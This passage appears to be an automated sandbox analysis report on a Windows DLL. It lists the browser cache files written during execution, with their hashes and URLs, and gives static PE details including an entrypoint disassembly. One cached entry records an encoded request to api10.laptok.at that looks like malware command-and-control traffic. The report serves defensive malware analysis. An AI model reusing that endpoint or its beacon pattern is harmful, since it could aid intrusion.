                                                                                                                                                                                                    SHA-512:0385C2FE61CFFF69EE6A85D13003B4729B93132007294DF3407DAAB97318157C421940D689E01B6CE5360A57029393FEAB949A83647DF22D43DF5064E7B82DD0
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1kc8s.img?m=6&o=true&u=true&n=true&w=30&h=30
                                                                                                                                                                                                    Preview: .PNG........IHDR.............;0......sRGB.........gAMA......a.....pHYs..........o.d....IDATHK.kZQ....W.Vc.-m,...&`....`."....b...%...E2...&.R*...*...A0......d."......>o-i....~...9...=?.!C.\{.j.bmmMR.V_.D......P(..j.*.Z-]..?...uV_...>.o.e.o..a.d21....|>..mh4..J...........g..H.......;..C.R..."........J....Q.9..^.......8>??O.zo.Z.h4.N...r9...).......>R.9...Kz..W.T....J.w.3fee..*a; ......+.X._]]....?q.\w.Ri.n.............p...CJ.N.Y....l:..).......d2.5..1.3d....\.s....6....nQ..Q...E..d.......l..B!2...G".H&..........ag5..ZR^..0.p.......4...\.2...6.....).........Xj.Ex.n.....&.Z.d.X..#V.b..lll..[...&''i........x....*8...w3..=.A...E..M.T..!8...Q(....L6)..r........h4..>......yj...j.9.:....f..+'._#......j..I...&.0.H4....<R...:....7.Y...n.......Z.s..2.....#A.j:s.....IEND.B`.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BBUE92F[1].png
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):708
                                                                                                                                                                                                    Entropy (8bit):7.5635226749074205
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:6v/78/gMGkt+fwrs8vYfbooyBf1e7XKH5bp6z0w6TDy9xB0IIDtqf/bU9Fqj1yfd:XGVw9oiNH5pbPDy9xmju/AXEyfYFW
                                                                                                                                                                                                    MD5:770E05618413895818A5CE7582D88CBA
                                                                                                                                                                                                    SHA1:EF83CE65E53166056B644FFC13AF981B64C71617
                                                                                                                                                                                                    SHA-256:EEC4AB26140F5AEA299E1D5D5F0181DDC6B4AC2B2B54A7EE9E7BA6E0A4B4667D
                                                                                                                                                                                                    SHA-512:B01D7D84339D5E1B3958E82F7679AFD784CE1323938ECA7C313826A72F0E4EE92BD98691F30B735A6544543107B5F5944308764B45DB8DE06BE699CA51FF7653
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBUE92F.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                    Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs...%...%.IR$....YIDAT8OM..LA...~..."".q...X........+"q@...A...&H..H...D.6..p.X".......z.d.f*......rg.?.....v7.....\.{eE..LB.rq.v.J.:*tv...w.....g../.ou.]7........B..{..|.S.......^....y......c.T.L...(.dA..9.}.....5w.N......>z.<..:.wq.-......T..w.8-.>P...Ke....!7L......I...?.mq.t....?..'.(....'j.......L<)L%........^..<..=M...rR.A4..gh...iX@co..I2....`9}...E.O.i?..j5.|$.m..-5....Z.bl...E......'MX[.M.....s...e..7..u<L.k.@c......k..zzV....O..........e.,.5.+%.,,........!.....y;..d.mK..v.J.C..0G:w...O.N...........J....|....b:L=...f:@6T[...F..t......x.....F.w..3....@.>.......!..bF.V..?u.b&q.......IEND.B`.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BBVuddh[1].png
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):304
                                                                                                                                                                                                    Entropy (8bit):6.758580075536471
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:6v/lhPkR/ChmU5nXyNbWgaviGjZ/wtDi6Xxl32inTvUI8zVp:6v/78/e5nXyNb4lueg32au/
                                                                                                                                                                                                    MD5:245557014352A5F957F8BFDA87A3E966
                                                                                                                                                                                                    SHA1:9CD29E2AB07DC1FEF64B6946E1F03BCC0A73FC5C
                                                                                                                                                                                                    SHA-256:0A33B02F27EE6CD05147D81EDAD86A3184CCAF1979CB73AD67B2434C2A4A6379
                                                                                                                                                                                                    SHA-512:686345FD8667C09F905CA732DB98D07E1D72E7ECD9FD26A0C40FEE8E8985F8378E7B2CB8AE99C071043BCB661483DBFB905D46CE40C6BE70EEF78A2BCDE94605
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                    Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........+......IDAT8O...P...3.....v..`0.}...'..."XD.`.`.5.3. ....)...a.-.............d.g.mSC.i..%.8*].}....m.$I0M..u.. ...,9.........i....X..<.y..E..M....q... ."...,5+..]..BP.5.>R....iJ.0.7.|?.....r.\-Ca......IEND.B`.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BBkwUr[1].png
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):431
                                                                                                                                                                                                    Entropy (8bit):7.092776502566883
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:6v/78/kFkUgT6V0UnwQYst4azG487XqYsT:YgTA0UnwMM487XqZT
                                                                                                                                                                                                    MD5:D59ADB8423B8A56097C2AE6CBEDBEC57
                                                                                                                                                                                                    SHA1:CAFB3A8ABA2423C99C218C298C28774857BEBB46
                                                                                                                                                                                                    SHA-256:4CC08B49D22AF4993F4B43FD05DE6E1E98451A83B3C09198F58D1BAFD0B1BFC3
                                                                                                                                                                                                    SHA-512:34001CBE0731E45FB000E31E45C7D7FEE039548B3EA91EBE05156A4040FA45BC75062A0077BF15E0D5255C37FE30F5AE3D7F64FDD10386FFBB8FDB35ED8145FC
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBkwUr.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                    Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J....DIDAT8O..M.EA...sad&V l.o.b.X..........O,.+..D....8_u.N.y.$......5.E..D.......@...A.2.....!..7.X.w..H.../..W2.....".......c.Q......x+f..w.H.`...1...J.....~'.{z)fj...`I.W.M..(.!..&E..b...8.1w.U...K.O,.....1...D.C..J....a..2P.9.j.@.......4l....Kg6.....#........g....n.>.p.....Q........h1.g .qA\..A..L .|ED...>h....#....IEND.B`.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\TspIchn[1].htm
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):339392
                                                                                                                                                                                                    Entropy (8bit):5.999967656351339
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6144:cDJl443S9YbS47Fk3Zsv12tXBQWgy01CGFSpjYC5osGAEcJMizvDupzStPX56:cB35u8u6vMFgy0cWUGlMv65oXM
                                                                                                                                                                                                    MD5:415DBB7F17A00913790F8E99ADBB9D93
                                                                                                                                                                                                    SHA1:C7D1A1B88A46A1E65B109257BFFFB5259900AF17
                                                                                                                                                                                                    SHA-256:3A7B725B6B273BFCFDBEC5A06868562AD848034EFBA247BE5739858768FC3B0A
                                                                                                                                                                                                    SHA-512:39C6EB2B71D0D68E0AEAC7DF2CCBDA743633A94895D90DC2569D866F1490A33200BEB29AC31573F2814E78487FF6FC50D492AC049213C8542ACE6BF23F24D048
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:http://api10.laptok.at/api1/9a3FdV_2FOe2lNWBzywhye/a2rzbdQuOhRbh/1tMI9TP_/2FFHpcEjc2zIsj3nY_2FaRD/bbKOnK6Aw9/T9Li8ZpaG0hs_2FEE/_2B0kgl3vplN/HPMJmXJvTbm/kjHzz19HUtkaT1/4BDTN7ZVSNKtMR3H5nP4a/s8_2F3CxujepwtCo/By36bxNYadNwz_2/FEk2aSXfXLicJH7n4U/7D_2FTfi5/cc2nrD5Ag2qXRkQmnDt6/1GTWH5aoTuyoAdeDUx1/UqFEv13ML45n9P1f5D7a2h/spqio1V138YVU/_2FSoCJL/_2BPfPH_2FwmC1xDPsgb90b/lJFlQYaXBd/gV1Ci2eCEez/TspIchn
                                                                                                                                                                                                    Preview: 6jOtPWjpJsKgG9IhgDi2XnSCJeSPxONX1nV8WY+GCWFWyqgjjf6aBHZ4Gm39WG35NlAjlSFMwsnGPoXAWLoM/VLRnXdPawnt6pIAayjW023ZgrADWj9Fjr/hEsQCUe4YN7RczMhFfFBSJE/eeaHpbpQOy3XXJLCECMM3JawVyKI5iDJIFdt8LR0d0hT19sg73Ioo/OjZ0sudP5iixOsSUCP++ITfM5DX+ewXXNSgm3azZl1EqLWpD9YZWm1PgJLqtij73+/eCtHQdmU+FFqUDQ3Xnpks7WjfKicoK3vhxYzfuwHE3AUCMVgzwFEzknjCe9uIblPLxqxWMU6JLDpeSTbcyxbKggkrp+O89ZEF+bScp5n9Jc1fsIkM9Ncw15Qt0YTxV/MgV22XDxC1hTWXMQuNHwUzeqTfFvh26+BNxM/PwN5yOJhezaNZpQp7q9tDSNskdDTftyq4K8ofKgCZv15zm+l5u7/Mcd5nxwUPW5WsXa7ib9QPplhF063avjRaAFWVpamPBkQP1N1SoIbNNFsgzHlH79gPaBwu3X1dEAe3blRumLGYr8OAsEwvbOVxJvLh6q753BMvZjXGdTk+9dFyubDa1jpLDtD176vNa++TwgurI3dCIbwwGkxT+S7BtkCz2UsVl8/oxv+pyVqTuFWJNBVsjmMBTH+o6ixzyxY4kCoQ14J3W6MW8QSctnAS2US5UlzBdCiE7HQNno7026e8F26RpsiAmcjtEeqQ38jAnTbDfOm/u+sBYDbOeAwpBjLG/DryeM3Qi9w7O6LujG5iaCPrVUxgHhW5/6oMR8sdtLTYSw3ERvJPdZq/pt+pOqSVnTDfixNvt8OAYhiEKwuSyGf5nQHyRruX1Tvy+NIGP/+PTpz8rcqR3pPUYDDDZA7zg4T1I/Y2vuZ1crSAZAJy6aXwJD0XSAvEzXw3OBHfnIBt14DTppquKuqVJanzB0revx3N8H8GUUIncQil4aNk4MPGk5P4qJOiPkQT
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\a8a064[1].gif
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:GIF image data, version 89a, 28 x 28
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):16360
                                                                                                                                                                                                    Entropy (8bit):7.019403238999426
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:g2SEiHys4AeP/6ygbkUZp72i+ccys4AeP/6ygbkUZaoGBm:g2Tjs4Ae36kOpqi+c/s4Ae36kOaoGm
                                                                                                                                                                                                    MD5:3CC1C4952C8DC47B76BE62DC076CE3EB
                                                                                                                                                                                                    SHA1:65F5CE29BBC6E0C07C6FEC9B96884E38A14A5979
                                                                                                                                                                                                    SHA-256:10E48837F429E208A5714D7290A44CD704DD08BF4690F1ABA93C318A30C802D9
                                                                                                                                                                                                    SHA-512:5CC1E6F9DACA9CEAB56BD2ECEEB7A523272A664FE8EE4BB0ADA5AF983BA98DBA8ECF3848390DF65DA929A954AC211FF87CE4DBFDC11F5DF0C6E3FEA8A5740EF7
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
                                                                                                                                                                                                    Preview: GIF89a.......dbd...........lnl.........trt..................!..NETSCAPE2.0.....!.......,..........+..I..8...`(.di.h..l.p,..(.........5H.....!.......,.........dbd...........lnl......dfd....................../..I..8...`(.di.h..l..e.....Q... ..-.3...r...!.......,.........dbd..............tvt...........................*P.I..8...`(.di.h.v.....A<.. ......pH,.A..!.......,.........dbd........|~|......trt...ljl.........dfd......................................................B`%.di.h..l.p,.t]S......^..hD..F. .L..tJ.Z..l.080y..ag+...b.H...!.......,.........dbd.............ljl.............dfd........lnl..............................................B.$.di.h..l.p.'J#............9..Eq.l:..tJ......E.B...#.....N...!.......,.........dbd...........tvt.....ljl.......dfd.........|~|.............................................D.$.di.h..l.NC.....C...0..)Q..t...L:..tJ.....T..%...@.UH...z.n.....!.......,.........dbd..............lnl.........ljl......dfd...........trt...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\e151e5[1].gif
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                    Entropy (8bit):3.122191481864228
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:CUTxls/1h/:7lU/
                                                                                                                                                                                                    MD5:F8614595FBA50D96389708A4135776E4
                                                                                                                                                                                                    SHA1:D456164972B508172CEE9D1CC06D1EA35CA15C21
                                                                                                                                                                                                    SHA-256:7122DE322879A654121EA250AEAC94BD9993F914909F786C98988ADBD0A25D5D
                                                                                                                                                                                                    SHA-512:299A7712B27C726C681E42A8246F8116205133DBE15D549F8419049DF3FCFDAB143E9A29212A2615F73E31A1EF34D1F6CE0EC093ECEAD037083FA40A075819D2
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
                                                                                                                                                                                                    Preview: GIF89a.............!.......,...........D..;
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\fcmain[1].js
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):38376
                                                                                                                                                                                                    Entropy (8bit):5.066252643555933
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:768:P1avn4u3hPPXW94h8zpEMv/YXf9wOBEZn3SQN3GFl295ok6elGjBQ6elyska:dQn4uRHWmh8zmMv/YXf9wOBEZn3SQN3X
                                                                                                                                                                                                    MD5:49E3474775215A51371E367C126F9019
                                                                                                                                                                                                    SHA1:CF5F7BFA8269CC48FECDFD090F21EAC2DE919F89
                                                                                                                                                                                                    SHA-256:B76068D72395ACEA32BA01DA392E2B5F7548DCFEE41BD2399C8C6EE2DC421335
                                                                                                                                                                                                    SHA-512:E06E55EA0C1C4F19617216BBD90BBE5CFD9F5DB1A7D955404FC234F64A6DE27D566478955FE8AAED01B8E8A3278F1F9CC994217D9519E88B458E421AE9C6812B
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3D%3D&crid=722878611&size=306x271&cc=CH&https=1&vif=2&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&nse=5&vi=1613420770406645614&ugd=4&rtbs=1&nb=1&cb=window._mNDetails.initAd
                                                                                                                                                                                                    Preview: ;window._mNDetails.initAd({"vi":"1613420770406645614","s":{"_mNL2":{"size":"306x271","viComp":"1613420418996354933","hideAdUnitABP":true,"abpl":"3","custHt":"","setL3100":"1"},"lhp":{"l2wsip":"2887305235","l2ac":"","sethcsd":"set!N7|983"},"_mNe":{"pid":"8PO641UYD","requrl":"https://www.msn.com/de-ch/?ocid=iehp#mnetcrid=722878611#"},"_md":[],"ac":{"content":"<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.01 Transitional\/\/EN\" \"http:\/\/www.w3.org\/TR\/html4\/loose.dtd\">\r\n<html xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\r\n<head><meta http-equiv=\"x-dns-prefetch-control\" content=\"on\"><style type=\"text\/css\">body{background-color: transparent;}<\/style><meta name=\"tids\" content=\"a='800072941' b='803767816' c='msn.com' d='entity type'\" \/><script type=\"text\/javascript\">try{window.locHash = (parent._mNDetails && parent._mNDetails.getLocHash && parent._mNDetails.getLocHash(\"722878611\",\"1613420770406645614\")) || (parent._mNDetails[\"locHash\"] && paren
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\fcmain[2].js
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):38874
                                                                                                                                                                                                    Entropy (8bit):5.051913931467512
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:768:p1av44u3hPPxW94hWGa7ExEuaYXf9wOBEZn3SQN3GFl295o2/8lAbA/r/8lA/sZ3:7Q44uRhWmhJaoxEuaYXf9wOBEZn3SQND
                                                                                                                                                                                                    MD5:5422169F2532AF7A6AB1A7E7A47A845D
                                                                                                                                                                                                    SHA1:A95093FE1000E3CD26ED718B5D9977F930D16460
                                                                                                                                                                                                    SHA-256:23DDE90088FF386A38825FB403E99DFE70AC6A40293EC8142F4F0CB9DC937F77
                                                                                                                                                                                                    SHA-512:C54015A07068E087D3E62171165CE0E14E0E2286F3A5BE90DC67528FAAB55FB57093091234F9736659D7DF20EFFDB3B4A14B0B5E6DBAAB3B8B27B865656B1C87
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3D%3D&crid=858412214&size=306x271&cc=CH&https=1&vif=2&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&nse=5&vi=1613420770839298944&ugd=4&rtbs=1&nb=1&cb=window._mNDetails.initAd
                                                                                                                                                                                                    Preview: ;window._mNDetails.initAd({"vi":"1613420770839298944","s":{"_mNL2":{"size":"306x271","viComp":"1613420770839298944","hideAdUnitABP":true,"abpl":"3","custHt":"","setL3100":"1"},"lhp":{"l2wsip":"2886930199","l2ac":"","sethcsd":"set!N7|983"},"_mNe":{"pid":"8PO8WH2OT","requrl":"https://www.msn.com/de-ch/?ocid=iehp#mnetcrid=858412214#"},"_md":[],"ac":{"content":"<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.01 Transitional\/\/EN\" \"http:\/\/www.w3.org\/TR\/html4\/loose.dtd\">\r\n<html xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\r\n<head><meta http-equiv=\"x-dns-prefetch-control\" content=\"on\"><style type=\"text\/css\">body{background-color: transparent;}<\/style><meta name=\"tids\" content=\"a='800072941' b='803767816' c='msn.com' d='entity type'\" \/><script type=\"text\/javascript\">try{window.locHash = (parent._mNDetails && parent._mNDetails.getLocHash && parent._mNDetails.getLocHash(\"858412214\",\"1613420770839298944\")) || (parent._mNDetails[\"locHash\"] && paren

                                                                                                                                                                                                    Static File Info

                                                                                                                                                                                                    General

                                                                                                                                                                                                    File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Entropy (8bit):6.790725842982734
                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                    • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                    File name:NJPcHPuRcG.dll
                                                                                                                                                                                                    File size:360448
                                                                                                                                                                                                    MD5:48ac334e786156ef605b82dd563373f4
                                                                                                                                                                                                    SHA1:1710cf3539eaaf618a613e690157adf30550fade
                                                                                                                                                                                                    SHA256:71b928fd0b29e21bbfa4755b5347f4dc40653a82ec7ecf4947e325dbec23abaa
                                                                                                                                                                                                    SHA512:e32f9f05ede3025e108f307f6c76bd95b00dadb64e5cc45e78793e8bf97c929ba26802f7bff8d27b570459df695f4e3e67cd2e6b7563055cdc895530d7ce557c
                                                                                                                                                                                                    SSDEEP:6144:+87Sm49lFRQSAe5klIQm3n/ym1grjpY7nf9fv3lYdkv+hgG2KnG4r/gU:Wm+3QSAdm3n/yogZgJv3Gqv0gG2uG4jv
                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b.6.&.X.&.X.&.X..F%.>.X..F6...X..F5...X./...#.X.&.Y.I.X..F*.'.X..F".'.X..F$.'.X..F .'.X.Rich&.X.........PE..L....Z.E...........

                                                                                                                                                                                                    File Icon

                                                                                                                                                                                                    Icon Hash:74f0e4ecccdce0e4

                                                                                                                                                                                                    Static PE Info

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Entrypoint:0x100285d5
                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                                    Imagebase:0x10000000
                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                                                                                                                    DLL Characteristics:
                                                                                                                                                                                                    Time Stamp:0x45C55A8A [Sun Feb 4 04:01:14 2007 UTC]
                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                    OS Version Major:4
                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                    File Version Major:4
                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                    Import Hash:e0e710d4ed87ec11636d345dba071187

                                                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                    cmp dword ptr [esp+08h], 01h
                                                                                                                                                                                                    jne 00007FDAE4A29AF7h
                                                                                                                                                                                                    call 00007FDAE4A328A0h
                                                                                                                                                                                                    push dword ptr [esp+04h]
                                                                                                                                                                                                    mov ecx, dword ptr [esp+10h]
                                                                                                                                                                                                    mov edx, dword ptr [esp+0Ch]
                                                                                                                                                                                                    call 00007FDAE4A299E2h
                                                                                                                                                                                                    pop ecx
                                                                                                                                                                                                    retn 000Ch
                                                                                                                                                                                                    mov eax, dword ptr [esp+04h]
                                                                                                                                                                                                    xor ecx, ecx
                                                                                                                                                                                                    cmp eax, dword ptr [100503A0h+ecx*8]
                                                                                                                                                                                                    je 00007FDAE4A29B04h
                                                                                                                                                                                                    inc ecx
                                                                                                                                                                                                    cmp ecx, 2Dh
                                                                                                                                                                                                    jl 00007FDAE4A29AE3h
                                                                                                                                                                                                    lea ecx, dword ptr [eax-13h]
                                                                                                                                                                                                    cmp ecx, 11h
                                                                                                                                                                                                    jnbe 00007FDAE4A29AFEh
                                                                                                                                                                                                    push 0000000Dh
                                                                                                                                                                                                    pop eax
                                                                                                                                                                                                    ret
                                                                                                                                                                                                    mov eax, dword ptr [100503A4h+ecx*8]
                                                                                                                                                                                                    ret
                                                                                                                                                                                                    add eax, FFFFFF44h
                                                                                                                                                                                                    push 0000000Eh
                                                                                                                                                                                                    pop ecx
                                                                                                                                                                                                    cmp ecx, eax
                                                                                                                                                                                                    sbb eax, eax
                                                                                                                                                                                                    and eax, ecx
                                                                                                                                                                                                    add eax, 08h
                                                                                                                                                                                                    ret
                                                                                                                                                                                                    call 00007FDAE4A302E8h
                                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                                    jne 00007FDAE4A29AF8h
                                                                                                                                                                                                    mov eax, 10050508h
                                                                                                                                                                                                    ret
                                                                                                                                                                                                    add eax, 08h
                                                                                                                                                                                                    ret
                                                                                                                                                                                                    call 00007FDAE4A302D5h
                                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                                    jne 00007FDAE4A29AF8h
                                                                                                                                                                                                    mov eax, 1005050Ch
                                                                                                                                                                                                    ret
                                                                                                                                                                                                    add eax, 0Ch
                                                                                                                                                                                                    ret
                                                                                                                                                                                                    push esi
                                                                                                                                                                                                    call 00007FDAE4A29ADCh
                                                                                                                                                                                                    mov ecx, dword ptr [esp+08h]
                                                                                                                                                                                                    push ecx
                                                                                                                                                                                                    mov dword ptr [eax], ecx
                                                                                                                                                                                                    call 00007FDAE4A29A82h
                                                                                                                                                                                                    pop ecx
                                                                                                                                                                                                    mov esi, eax
                                                                                                                                                                                                    call 00007FDAE4A29AB5h
                                                                                                                                                                                                    mov dword ptr [eax], esi
                                                                                                                                                                                                    pop esi
                                                                                                                                                                                                    ret
                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                                                    sub esp, 48h
                                                                                                                                                                                                    mov eax, dword ptr [10050514h]
                                                                                                                                                                                                    xor eax, ebp
                                                                                                                                                                                                    mov dword ptr [ebp-04h], eax
                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                    xor ebx, ebx
                                                                                                                                                                                                    push esi
                                                                                                                                                                                                    mov esi, dword ptr [ebp+08h]
                                                                                                                                                                                                    cmp dword ptr [esi+14h], ebx
                                                                                                                                                                                                    push edi
                                                                                                                                                                                                    mov dword ptr [ebp-2Ch], ebx
                                                                                                                                                                                                    mov dword ptr [ebp-24h], ebx
                                                                                                                                                                                                    mov dword ptr [ebp-1Ch], ebx
                                                                                                                                                                                                    mov dword ptr [ebp-28h], ebx

                                                                                                                                                                                                    Rich Headers

                                                                                                                                                                                                    Programming Language:
                                                                                                                                                                                                    • [RES] VS2005 build 50727
                                                                                                                                                                                                    • [ C ] VS2005 build 50727
                                                                                                                                                                                                    • [EXP] VS2005 build 50727
                                                                                                                                                                                                    • [C++] VS2005 build 50727
                                                                                                                                                                                                    • [ASM] VS2005 build 50727
                                                                                                                                                                                                    • [LNK] VS2005 build 50727
                                                                                                                                                                                                    • [IMP] VS2008 SP1 build 30729

                                                                                                                                                                                                    Data Directories

                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x4f0200x93.rdata
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x4e7540x3c.rdata
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xb10000x4d0.rsrc
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xb20000x1c98.reloc
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x3e2200x1c.rdata
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x4cc280x40.rdata
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x3e0000x1b4.rdata
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                    Sections

                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                    .text0x10000x3c44c0x3d000False0.709152471824data6.87914884899IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                    .rdata0x3e0000x110b30x12000False0.671671549479data6.38365470065IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
